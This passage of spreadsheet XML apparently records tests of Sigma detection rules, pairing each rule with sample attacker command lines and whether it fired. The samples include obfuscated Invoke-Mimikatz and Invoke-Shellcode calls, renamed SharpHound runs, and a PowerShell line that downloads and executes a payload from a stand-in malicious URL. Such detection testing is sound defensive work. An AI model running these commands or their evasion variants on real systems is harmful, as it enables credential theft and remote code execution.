    </row>
    <row r="2888" ht="15.75" customHeight="1" s="42">
      <c r="A2888" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2888" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2888" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2888" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2888" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2888" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2888" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2888" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2888" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2889" ht="15.75" customHeight="1" s="42">
      <c r="A2889" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2889" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2889" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2889" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2889" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2889" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I288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89" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2889" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2890" ht="15.75" customHeight="1" s="42">
      <c r="A2890" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2890" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2890" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2890" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2890" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2890" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I289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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2890" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2891" ht="15.75" customHeight="1" s="42">
      <c r="A2891" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2891" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2891" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2891" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2891" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2891" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I289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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2891" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2892" ht="15.75" customHeight="1" s="42">
      <c r="A2892" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2892" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2892" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2892" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2892" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2892" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I289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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2892" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2893" ht="15.75" customHeight="1" s="42">
      <c r="A2893" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2893" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2893" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2893" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2893" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2893" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I289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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2893" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2894" ht="15.75" customHeight="1" s="42">
      <c r="A2894" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2894" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2894" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2894" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2894" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2894" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2894" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2894" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I289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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2894" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2895" ht="15.75" customHeight="1" s="42">
      <c r="A2895" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2895" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2895" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2895" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2895" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2895" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I289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895" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2895" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2896" ht="15.75" customHeight="1" s="42">
      <c r="A2896" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B2896" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2896" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2896" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2896" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F2896" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2896" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2896" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2896" s="43" t="n"/>
      <c r="J2896" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2896" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2897" ht="15.75" customHeight="1" s="42">
      <c r="A2897" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B2897" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2897" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2897" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2897" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F2897" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2897" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2897" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2897" s="44" t="n"/>
      <c r="J2897" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2897" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2898" ht="15.75" customHeight="1" s="42">
      <c r="A2898" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B2898" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2898" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2898" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2898" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F2898" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2898" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2898" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2898" s="43" t="n"/>
      <c r="J2898" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2898" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2899" ht="15.75" customHeight="1" s="42">
      <c r="A2899" s="43" t="n"/>
      <c r="B2899" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2899" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2899" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2899" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2899" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2899" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2899" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2899" s="44" t="n"/>
      <c r="J2899" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2899" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2900" ht="15.75" customHeight="1" s="42">
      <c r="A2900" s="43" t="n"/>
      <c r="B2900" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2900" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2900" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2900" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2900" s="44" t="n"/>
      <c r="J2900" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2900" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2901" ht="15.75" customHeight="1" s="42">
      <c r="A2901" s="43" t="n"/>
      <c r="B2901" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2901" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2901" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2901" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2901" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2901" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2901" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2901" s="44" t="n"/>
      <c r="J2901" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2901" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2902" ht="15.75" customHeight="1" s="42">
      <c r="A2902" s="43" t="n"/>
      <c r="B2902" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2902" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2902" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2902" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2902" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2902" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2902" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I290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02" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2902" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2903" ht="15.75" customHeight="1" s="42">
      <c r="A2903" s="43" t="n"/>
      <c r="B2903" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2903" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2903" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2903" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2903" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2903" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2903" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I290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03" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2903" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2904" ht="15.75" customHeight="1" s="42">
      <c r="A2904" s="43" t="n"/>
      <c r="B2904" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2904" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2904" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2904" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2904" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I290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04" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2904" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2905" ht="15.75" customHeight="1" s="42">
      <c r="A2905" s="43" t="n"/>
      <c r="B2905" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2905" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2905" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2905" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2905" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I290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05" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2905" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2906" ht="15.75" customHeight="1" s="42">
      <c r="A2906" s="43" t="n"/>
      <c r="B2906" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2906" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2906" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2906" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2906" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I290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06" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2906" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2907" ht="15.75" customHeight="1" s="42">
      <c r="A2907" s="43" t="n"/>
      <c r="B2907" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2907" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2907" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2907" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2907" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I290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07" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2907" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2908" ht="15.75" customHeight="1" s="42">
      <c r="A2908" s="43" t="n"/>
      <c r="B2908" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2908" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2908" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2908" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2908" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I290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08" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2908" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2909" ht="15.75" customHeight="1" s="42">
      <c r="A2909" s="43" t="n"/>
      <c r="B2909" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2909" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2909" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2909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909" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2909" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2909" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2909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09" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2909" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2910" ht="15.75" customHeight="1" s="42">
      <c r="A2910" s="43" t="n"/>
      <c r="B2910" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2910" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2910" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2910" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F2910" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2910" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2910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10" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2910" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2911" ht="15.75" customHeight="1" s="42">
      <c r="A2911" s="43" t="n"/>
      <c r="B2911" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2911" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2911" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2911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911" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2911" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2911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11" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2911" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2912" ht="15.75" customHeight="1" s="42">
      <c r="A2912" s="43" t="n"/>
      <c r="B2912" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2912" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2912" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2912" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2912" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2912" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2912" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2912" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2912" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2912" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2913" ht="15.75" customHeight="1" s="42">
      <c r="A2913" s="43" t="n"/>
      <c r="B2913" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2913" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2913" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2913" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2913" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2913" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2913" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2913" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2913" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2913" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2914" ht="15.75" customHeight="1" s="42">
      <c r="A2914" s="43" t="n"/>
      <c r="B2914" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2914" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2914" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2914" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2914" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2914" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2914" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2914" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2914" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2914" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2915" ht="15.75" customHeight="1" s="42">
      <c r="A2915" s="43" t="n"/>
      <c r="B2915" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2915" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2915" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2915" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2915" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2915" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2915" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2915" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2915" s="44" t="n">
        <v>0</v>
